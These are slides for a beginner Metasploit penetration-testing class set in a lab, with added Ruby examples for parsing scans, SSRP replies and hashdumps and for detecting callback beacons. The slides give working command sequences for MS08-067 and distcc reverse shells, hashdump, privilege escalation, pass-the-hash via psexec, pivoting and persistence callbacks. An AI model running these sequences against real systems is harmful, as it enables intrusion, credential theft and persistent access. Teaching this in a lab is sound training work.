Metasploit for Penetration Testing: Beginner Class

Slides for the beginning Metasploit class.

Published in: Technology
  1. Penetration Testing with Metasploit
     Georgia Weidman
  2. Acknowledgements
     • Metasploit Team
     • Offensive Security/Metasploit Unleashed
     • Hackers for Charity
     • David Kennedy
     • BSides Delaware Crew
     • Darren
  3. Agenda
     • Metasploit Basics
       – Some terminology/brief intro to pentesting
       – How Metasploit works
       – Interacting with Metasploit
     • Basic Exploitation
       – Exploiting a vulnerability using Metasploit console
     • Using Meterpreter
       – Using the Meterpreter shell for post exploitation
  4. Agenda
     • Metasploit in a penetration test
       – Information Gathering
       – Vulnerability Scanning
       – Exploitation in depth
       – Post exploitation
       – Reporting
     • Hack some stuff
       – Pop my boxes
  5. Connecting
     Wireless access point SSID: IgnatiusRiley
     Password: metasploit
  6. What's in the lab?
     • Windows XP SP2
       – IP address: 192.168.20.22
     • Ubuntu Linux 8.04 (Metasploitable)
       – IP address: 192.168.20.23
     Others below .100 (.100 and above are you guys)
  7. What is Penetration Testing?
     • Simulation of a real attack
     • Get out of jail free card for exploiting systems
     • Report to customers with findings and recommendations
     • Find and remediate vulnerabilities before attackers exploit them
  8. What is Metasploit?
     • Exploitation framework
     • Ruby based
     • Modular
     • Exploits, payloads, auxiliaries, and more
  9. Metasploit Terminology
     • Exploit: vector for penetrating the system
     • Payload: shellcode, what you want the exploit to do
     • Encoders: encode or mangle payload
     • Auxiliary: other modules besides exploitation
     • Session: connection from a successful exploit
  10. Metasploit Interfaces
     • Msfconsole
     • Msfcli
     • Msfweb, Msfgui (discontinued)
     • Metasploit Pro, Metasploit Express
     • Armitage
  11. Exploitation Streamlining
     • Traditional Pentest:
       – Find public exploit
       – Change offsets and return address for your target
       – Replace shellcode
     • Metasploit:
       – Load Metasploit module
       – Select target OS
       – Set IP addresses
       – Select payload
  12. Using Msfconsole: Exploitation
     • use <module> - sets exploit/auxiliary/etc. to use
     • set <x X> - set a parameter
     • setg <x X> - set a parameter globally
     • show <x> - lists all available x
     • exploit - runs the selected module
  13. Windows Exploitation Example
     search windows/smb
     info windows/smb/ms08_067_netapi
     use windows/smb/ms08_067_netapi
     show payloads
     set payload windows/meterpreter/reverse_tcp
     show options
     set lhost 192.168.20.22 (set other options as well)
     exploit
  14. MSFcli Exploitation Example
     ./msfcli <exploit> <option=x> E
     Example: msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.2 LHOST=192.168.1.3 PAYLOAD=windows/shell/bind_tcp E
     E = exploit
     O = show options
     P = show payloads
  15. Linux Exploitation Example
     search distcc
     use unix/misc/distcc_exec
     show payloads
     set payload cmd/unix/reverse
     show options
     set rhost 192.168.20.23
     set lhost 192.168.20.102 (your ip)
     exploit
  16. Sessions
     • sessions -l lists all active sessions
     • sessions -i <id> interact with a given session
  17. Meterpreter
     • Gain a session using a meterpreter payload
     • Memory based/never hits the disk
     • Everything a shell can do plus extra
  18. Meterpreter Commands
     • help - shows all available commands
     • background - backgrounds the session
     • ps - shows all processes
     • migrate <process id> - moves meterpreter to another process
     • getuid - shows the user
  19. Meterpreter Commands
     • download <file> - pulls a file from the victim
     • upload <file on attacker> <file on victim> - pushes a file to the victim
     • hashdump - dumps the hashes from the SAM
     • shell - drops you in a shell
  20. Exercise
     In Msfconsole use ms08_067_netapi to get a reverse meterpreter shell on the Windows XP machine.
     Experiment with different payloads and meterpreter commands.
  21. Information Gathering
     • Learning as much about a target as possible
     • Examples: open ports, running services, installed software
     • Identify points for further exploration
  22. Metasploit and Databases
     • Metasploit supports MySQL and PostgreSQL
     • /etc/init.d/postgresql-8.4 start (starts PostgreSQL)
     • msf > db_connect postgres:password@127.0.0.1/metasploit (connects to database server and creates database metasploit)
  23. Portscanning
     • Queries a host to see if a program is listening
     • Ex: Browsing to a website - webserver listens on port 80
     • Listening ports are accessible by an attacker and if vulnerable may be used for exploitation
     • Ex: ms08_067_netapi exploits smb on port 445
  24. Metasploit and nmap
     • Port scanning and just about everything else
     • http://nmap.org/ man nmap
     • Ex: nmap -sV 192.168.20.20-99 -oA subnet1 (TCP version scan, all hosts 192.168.20.X, outputs multiple formats beginning with subnet1)
     • msf > db_import subnet1.xml
  25. MSF Auxiliary Portscanners
     • msf > search portscan (shows portscan modules)
     • scanner/portscan/tcp (runs a TCP syn scan)
     • Use auxiliary modules like exploits (use, set, exploit, etc.)
  26. Some Other MSF Scanners
     • scanner/smb/smb_version (scans port 445 for the smb version, good way to get OS version)
     • scanner/ssh/ssh_version (queries the ssh version)
     • scanner/ftp/anonymous (anonymous ftp login)
  27. Vulnerability Scanning
     • Query systems for potential vulnerabilities
     • Identify potential methods of penetration
     • Ex: SMB version scan in information gathering returned port 445 open and target Windows XP SP2, scan for ms08_067_netapi vulnerability
  28. Metasploit and Nessus
     • Tenable's Vulnerability Scanner (http://www.nessus.org)
     • msf > load nessus
     • msf > nessus_connect student1:password@192.168.20.103 ok (ok says no ssl is ok)
     • msf > nessus_policy_list
     • msf > nessus_scan_new -4 pwnage <ip range> (scan using policy one, name it pwnage)
     • msf > nessus_report_list
     • msf > nessus_report_get <report id>
  29. Metasploit Vulnerability Scanners
     • SMB Login: Given a set of credentials what systems can they access?
       – scanner/smb/smb_login
     • Open VNC and X11: If misconfigured may be accessible without credentials
       – scanner/vnc/vnc_none_auth
       – scanner/x11/open_x11
  30. Using Msfconsole: Exploitation
     • use <module> - sets exploit/auxiliary/etc. to use
     • set <x X> - set a parameter
     • setg <x X> - set a parameter globally
     • show <x> - lists all available x
     • exploit - runs the selected module
  31. Our Database
     • hosts
     • services
     • vulns
     • -c select columns
     • -s search for specific string
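Slide 24 imports an nmap XML file into the database and slide 31 then lists hosts and services and searches them with -s. The script below is an added example, not code from these slides or from Metasploit: it parses a constructed nmap -oX document with Ruby's standard REXML library and implements the same host listing, open-port listing and service search, so you can see what db_import actually records and what services -s matches against. The XML, the two lab addresses in it and the banners are constructed for the example.

```ruby
require 'rexml/document'

# Constructed nmap -oX output for this example (not a real scan of the lab).
# The element layout follows nmap's XML: nmaprun > host > address, ports > port > state, service.
SAMPLE_NMAP_XML = <<~XML
  <?xml version="1.0"?>
  <nmaprun scanner="nmap" args="nmap -sV 192.168.20.20-99 -oA subnet1">
    <host>
      <status state="up"/>
      <address addr="192.168.20.22" addrtype="ipv4"/>
      <ports>
        <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
        <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Microsoft Windows XP microsoft-ds"/></port>
        <port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-wbt-server"/></port>
      </ports>
    </host>
    <host>
      <status state="up"/>
      <address addr="192.168.20.23" addrtype="ipv4"/>
      <ports>
        <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1"/></port>
        <port protocol="tcp" portid="3632"><state state="open"/><service name="distccd" product="distccd" version="v1"/></port>
      </ports>
    </host>
  </nmaprun>
XML

# One row of what db_import would store in the services table.
Service = Struct.new(:host, :port, :proto, :state, :name, :info)

def parse_nmap_xml(xml)
  doc = REXML::Document.new(xml)
  services = []
  doc.elements.each('nmaprun/host') do |host|
    ip = nil
    host.elements.each('address') { |a| ip = a.attributes['addr'] if a.attributes['addrtype'] == 'ipv4' }
    next unless ip
    host.elements.each('ports/port') do |port|
      state_el = port.elements['state']
      state = state_el ? state_el.attributes['state'] : 'unknown'
      svc = port.elements['service']
      name = svc ? svc.attributes['name'] : nil
      info = svc ? [svc.attributes['product'], svc.attributes['version']].compact.join(' ') : ''
      services << Service.new(ip, port.attributes['portid'].to_i, port.attributes['protocol'], state, name, info)
    end
  end
  services
end

# Equivalent of the "hosts" command: every address the import touched.
def hosts(services)
  services.map(&:host).uniq
end

# Open ports for one host, sorted, as the services table would show them.
def open_ports(services, host)
  services.select { |s| s.host == host && s.state == 'open' }.map(&:port).sort
end

# Equivalent of "services -s <string>": open services whose name or banner matches.
def search_services(services, text)
  re = Regexp.new(Regexp.escape(text), Regexp::IGNORECASE)
  services.select { |s| s.state == 'open' && [s.name, s.info].any? { |f| re.match?(f.to_s) } }
end

if __FILE__ == $PROGRAM_NAME
  svcs = parse_nmap_xml(SAMPLE_NMAP_XML)
  hosts(svcs).each { |h| puts "#{h}: open tcp #{open_ports(svcs, h).join(', ')}" }
  search_services(svcs, 'distcc').each { |s| puts "match: #{s.host}:#{s.port} #{s.name} #{s.info}" }
end
```

Only open ports are searchable, mirroring the point of slide 23: a closed port is not reachable by an attacker, so it does not belong in the list of things to test next.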
  32. db_autopwn
     • By default just runs all the exploits that match a given open port
     • Not stealthy
     • Using vulnerability data can be made smarter, matches vulnerabilities instead of ports
     • db_autopwn -x -e
  33. Attacking MSSQL
     • MSSQL TCP port can change, UDP port is 1434
     • msf > search mssql (shows all mssql modules)
     • msf > use scanner/mssql/mssql_ping (queries UDP 1434 for information including TCP port)
     • msf > use scanner/mssql/mssql_login (tries passwords to log into mssql)
     • msf > use windows/mssql/mssql_payload (logs into mssql and gets a shell)
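Slide 33 says the MSSQL TCP port can change and that mssql_ping learns it from UDP 1434. That port is answered by the SQL Server Browser service using the SQL Server Resolution Protocol (SSRP): a reply byte 0x05, a two-byte little-endian length, and then "key;value" pairs for each instance, each instance terminated by ";;". The following is an added example, not code from the slides or from the mssql_ping module: it builds a constructed SSRP reply and parses it back, pulling out the TCP port for a named instance exactly as the scanner has to. The server name, instance names, version strings and port numbers are made up for the example.

```ruby
# Build a SQL Server Browser (SSRP) response as the UDP 1434 listener sends it:
# byte 0x05, a 2-byte little-endian length, then for each instance a run of
# "key;value" pairs joined by ';' and terminated by ';;'.
def build_ssrp_response(instances)
  body = instances.map { |f| f.map { |k, v| "#{k};#{v}" }.join(';') + ';;' }.join
  [0x05, body.bytesize].pack('Cv') + body
end

# Constructed response for the example: names, versions and ports are made up.
SAMPLE_SSRP_RESPONSE = build_ssrp_response([
  { 'ServerName' => 'SQLHOST', 'InstanceName' => 'MSSQLSERVER', 'IsClustered' => 'No',
    'Version' => '9.00.1399.06', 'tcp' => '50123', 'np' => '\\\\SQLHOST\\pipe\\sql\\query' },
  { 'ServerName' => 'SQLHOST', 'InstanceName' => 'PAYROLL', 'IsClustered' => 'No',
    'Version' => '10.50.1600.1', 'tcp' => '1433' }
])

# Parse a response into one Hash per instance. Malformed input raises rather
# than silently yielding an empty or wrong port, so a garbage datagram from an
# untrusted network cannot steer the caller to a port it never advertised.
def parse_ssrp_response(bytes)
  raise ArgumentError, 'not an SSRP response' unless bytes.bytesize >= 3 && bytes.getbyte(0) == 0x05
  len = bytes.byteslice(1, 2).unpack1('v')
  raise ArgumentError, 'truncated SSRP response' if bytes.bytesize < 3 + len
  body = bytes.byteslice(3, len)
  body.split(';;').reject(&:empty?).map do |entry|
    fields = entry.split(';', -1)
    raise ArgumentError, 'odd number of fields in instance entry' if fields.size.odd?
    fields.each_slice(2).to_h
  end
end

# The single detail mssql_ping is after: the TCP port the named instance uses.
# Instances without a 'tcp' key (TCP disabled) return nil.
def tcp_port_for(instances, instance_name)
  inst = instances.find { |i| i['InstanceName'] == instance_name }
  inst && inst['tcp'] ? inst['tcp'].to_i : nil
end

if __FILE__ == $PROGRAM_NAME
  parse_ssrp_response(SAMPLE_SSRP_RESPONSE).each do |inst|
    puts "#{inst['ServerName']}\\#{inst['InstanceName']} version #{inst['Version']} tcp #{inst['tcp'] || 'n/a'}"
  end
end
```

The reason this matters for defenders: the Browser service tells anyone who asks which port each instance is on, so moving the instance off 1433 hides nothing; blocking UDP 1434 at the network edge, or stopping the Browser service where named-instance discovery is not needed, is what actually removes the disclosure.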
  34. We have a shell, now what?
     • Privilege escalation
     • Local information gathering
     • Exploiting additional hosts
     • Maintaining access
     • Forensic avoidance
  35. Meterpreter: Privilege Escalation
     • A session has the privileges of the exploited process
     • getuid (tells you what user your session is running as)
     • getsystem (tries various techniques to escalate privileges)
  36. Meterpreter: Enabling Remote Desktop
     • Turn on remote desktop, get it through the firewall, put a user in the remote desktop users group
     • run getgui -e
  37. Meterpreter: Migrating
     • If the process that hosts meterpreter closes, meterpreter dies too
     • Example: client side exploit residing in the browser
     • meterpreter > ps (shows all processes)
     • meterpreter > migrate <process id> (moves to a new process)
  38. Meterpreter: Searching for Content
     • Look for specific interesting files on the exploited system
     • search -h
     • Example: search -f *.jpg (finds all the porn)
  39. Pivoting
     • Scenario: Exploit a dual networked host, with a routable interface and a non routable one. Can we attack other hosts on the non routable interface without SSH tunneling?
     • route add 10.0.0.0/24 1 (routes traffic to the subnet through session 1)
     • Now you can portscan, exploit, etc. the non routable subnet
  40. PSExec
     • hashdump (dumps the hashes, not always easy to crack)
     • Why not just pass the hash to other systems?
     • use windows/smb/psexec
     • set SMBPass to the hash
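Slide 40 notes that a dumped hash need not be cracked to be reused against other systems. What makes that reuse work across a network is the same local account password, and therefore the same NT hash, on many machines. The script below is an added example, not code from the slides or from Metasploit: it reads hashdump output (user:rid:lm_hash:nt_hash:::) collected from several hosts and reports NT hashes shared between hosts and accounts that still have a real LM hash stored, which is what a pentest report should call out and what a defender should go fix. The dump lines and the hash values are constructed for the example and are not hashes of any real password.

```ruby
# Constants every hashdump reader should know: the LM and NT hashes of an empty
# password. The LM value also means "no LM hash stored", which is the safe state.
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'

# Constructed hashdump output from two hosts. The hex values are made up for
# the example; they are not hashes of any real password.
SAMPLE_HASHDUMPS = {
  '192.168.20.22' => <<~DUMP,
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    student:1003:11111111111111111111111111111111:fedcba9876543210fedcba9876543210:::
  DUMP
  '192.168.20.24' => <<~DUMP,
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
    backup:1001:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
  DUMP
}

Account = Struct.new(:host, :user, :rid, :lm, :nt)

# hashdump lines are user:rid:lm_hash:nt_hash::: ; anything else is rejected.
def parse_hashdump(host, text)
  text.each_line.map(&:strip).reject(&:empty?).map do |line|
    user, rid, lm, nt = line.split(':')
    raise ArgumentError, "bad hashdump line: #{line}" unless nt && lm.size == 32 && nt.size == 32
    Account.new(host, user, rid.to_i, lm.downcase, nt.downcase)
  end
end

# NT hashes seen on more than one host, i.e. the same password set on several
# machines. This is what turns one compromised host into many, so it is the
# finding to report; the fix is a unique local administrator password per host.
def shared_nt_hashes(accounts)
  accounts.reject { |a| a.nt == EMPTY_NT }
          .group_by(&:nt)
          .select { |_nt, list| list.map(&:host).uniq.size > 1 }
          .transform_values { |list| list.map { |a| "#{a.user}@#{a.host}" } }
end

# Accounts with a real LM hash stored. LM hashes are trivially crackable, so
# their presence means the "do not store LAN Manager hash" setting is off there.
def lm_hashes_present(accounts)
  accounts.select { |a| a.lm != EMPTY_LM }
end

if __FILE__ == $PROGRAM_NAME
  accounts = SAMPLE_HASHDUMPS.flat_map { |host, text| parse_hashdump(host, text) }
  shared_nt_hashes(accounts).each { |nt, who| puts "shared NT hash #{nt}: #{who.join(', ')}" }
  lm_hashes_present(accounts).each { |a| puts "LM hash stored for #{a.user}@#{a.host}" }
end
```

Disabled or empty-password accounts (NT hash equal to the empty-password constant) are skipped on purpose: they share a hash on every host without meaning anything.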
  41. Meterpreter: Persistence
     • Persistence script installs a meterpreter service
     • Meterpreter comes back when the box restarts
     • Ex: run persistence -U -i 5 -p 443 -r 192.168.20.101 (respawns on login, at a 5 second interval on port 443 to ip 192.168.20.101)
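The -i 5 option on slide 41 makes the implant reconnect every five seconds, and that regularity is its most reliable network footprint. The script below is an added detection example, not code from the slides or from Metasploit: it reads outbound-connection records and flags source/destination/port triples whose inter-connection gaps are nearly constant. The log format ("<ISO 8601 time> <src> -> <dst>:<port>") and the log lines themselves are constructed for the example; the addresses reuse the lab's 192.168.20.x range from the slides.

```ruby
require 'time'

# Constructed outbound-connection records (firewall or netflow style), not real
# lab traffic. Assumed line format: "<ISO 8601 time> <src_ip> -> <dst_ip>:<dst_port>".
# The first group is a steady 5-second callback; the second is ordinary browsing.
SAMPLE_CONN_LOG = <<~LOG
  2011-05-01T10:00:00Z 192.168.20.22 -> 192.168.20.101:443
  2011-05-01T10:00:05Z 192.168.20.22 -> 192.168.20.101:443
  2011-05-01T10:00:10Z 192.168.20.22 -> 192.168.20.101:443
  2011-05-01T10:00:15Z 192.168.20.22 -> 192.168.20.101:443
  2011-05-01T10:00:20Z 192.168.20.22 -> 192.168.20.101:443
  2011-05-01T10:00:03Z 192.168.20.23 -> 192.168.20.50:80
  2011-05-01T10:00:41Z 192.168.20.23 -> 192.168.20.50:80
  2011-05-01T10:01:02Z 192.168.20.23 -> 192.168.20.50:80
  2011-05-01T10:02:30Z 192.168.20.23 -> 192.168.20.50:80
LOG

Conn = Struct.new(:time, :src, :dst, :port)
LINE_RE = /\A(\S+)\s+(\S+)\s+->\s+(\S+):(\d+)\z/

# Parse the log; lines that do not match the assumed format are skipped.
def parse_conn_log(text)
  text.each_line.map(&:strip).reject(&:empty?).map do |line|
    m = LINE_RE.match(line)
    m && Conn.new(Time.iso8601(m[1]), m[2], m[3], m[4].to_i)
  end.compact
end

# Flag (src, dst, port) tuples with at least min_conns connections whose gaps all
# lie within max_jitter (fraction of the mean gap) of that mean. Human-driven
# traffic has irregular gaps; a scripted callback does not.
def find_beacons(conns, min_conns: 4, max_jitter: 0.2)
  conns.group_by { |c| [c.src, c.dst, c.port] }.map do |key, list|
    next if list.size < min_conns
    times = list.map(&:time).sort
    gaps = times.each_cons(2).map { |a, b| b - a }
    mean = gaps.sum / gaps.size
    next if mean <= 0
    jitter = gaps.map { |g| (g - mean).abs }.max / mean
    next if jitter > max_jitter
    { src: key[0], dst: key[1], port: key[2], interval: mean.round(1), count: list.size }
  end.compact
end

if __FILE__ == $PROGRAM_NAME
  find_beacons(parse_conn_log(SAMPLE_CONN_LOG)).each do |b|
    puts "beacon: #{b[:src]} -> #{b[:dst]}:#{b[:port]} every #{b[:interval]}s (#{b[:count]} connections)"
  end
end
```

Port 443 by itself is no signal, since the script deliberately picks a port that blends in; the interval is what gives it away. On a real sensor, raise min_conns and widen max_jitter slightly, because real implants add random sleep to their interval precisely to defeat a check this strict.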
  42. Exercises
     • Perform a penetration test on the Windows and Linux systems we used in class
     • Perform a penetration test on the lab network
  43. Contact
     Georgia Weidman
     Website: http://www.grmn00bs.com http://www.georgiaweidman.com
     Email: georgia@grmn00bs.com
     Twitter: @vincentkadmon
